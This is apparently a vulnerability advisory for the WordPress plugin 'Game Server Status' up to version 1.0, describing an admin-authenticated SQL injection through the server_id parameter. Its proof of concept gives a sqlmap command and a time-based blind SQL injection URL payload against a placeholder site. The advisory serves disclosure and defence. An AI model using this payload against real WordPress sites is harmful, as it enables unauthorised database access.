WordPress Plugin Vulnerabilities
Game Server Status <= 1.0 - Admin+ SQL Injection
Description
The plugin does not validate or escape the server_id parameter before using it in SQL statement, leading to an Authenticated SQL Injection in an admin page
Proof of Concept
sqlmap -u "https://example.com/wp-admin/admin.php?page=grohsfabian-add-game-servers&server_id=1" -p server_id --dbms mysql --cookie [your cookie] https://example.com/wp-admin/admin.php?page=grohsfabian-add-game-servers&server_id=1+OR+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)
Affects Plugins
References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Neppah
Submitter
Neppah
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-09-21 (about 2 years ago)
Added
2021-09-21 (about 2 years ago)
Last Updated
2022-04-10 (about 2 years ago)